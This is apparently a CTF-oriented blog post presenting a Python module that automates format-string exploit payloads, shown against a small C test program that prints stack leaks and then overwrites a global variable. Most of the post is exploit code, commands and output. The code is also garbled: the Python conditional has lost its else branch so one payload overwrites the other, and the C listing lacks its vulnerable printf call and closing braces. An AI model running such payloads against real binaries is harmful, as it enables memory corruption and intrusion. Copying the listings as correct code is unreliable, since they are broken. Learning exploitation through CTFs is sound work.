Module in Python for automating “Format String Vulnerability”

I have written small module in python where we can automate the “format string vulnerability”.

Most of the time when i find format string vulnerability binaries in CTF’s i kept on doing the small scripting part again and again, so i have decided to write a module that keeps the work simple.

import struct
def p32(val):
    return str(struct.pack("<I", val))

def makepayload(leak, addr, offset):
    upper = int((leak)[2:6],16)
    lower = int((leak)[6:10],16)

    if (upper <= lower):
        payload = p32(addr + 2)+p32(addr)+"%"+str(upper-8) +"x%"+ offset + "$hn"+"%"+str(abs(lower-upper))+ "x%" + str(int(offset) + 1) + "$hn"

        payload = p32(addr)+p32(addr + 2)+"%"+str(lower-8) +"x%" + offset +"$hn"+"%"+str(abs(upper-lower))+"x%" + str(int(offset) + 1) +"$hn"

    return payload

You can just import this and attack the binary, any ways i will try to demonstrate using small example.


int data;

int main(int argc, char **argv){

  data = 0;
  if(argc != 2){
    printf("Enter argument\n");
    return 0;
  char buf[100];
  strncpy(buf, argv[1],100);

  if(data == 0)
    printf("Data not changed\n");
    printf("Data changed!!!\n");
  return 0;

In this binary i am just aiming to change the value of global variable data using the vulnerable “printf”.

➜  module ./try $(python -c 'print "A"*4 + "-%x"*10')
AAAA-ffdef99e-64-ffdef0a4-41414141-2d78252d-252d7825-78252d78-2d78252d-252d7825-78252d78Data not changed

So here i can read stack and could read the input AAAA at 4th position and using gdb i can found out the address of data.

Here is the exploit.

import format
payload = format.makepayload('0x00000100', 0x0804a030,      '4')
                              value     address of data    offset  
print payload

Here is the output

 ➜  module python 
➜  module ./try $(python
2�0�ffdee9a5                                                                                                                                                                                                                                                              64Data changed!!!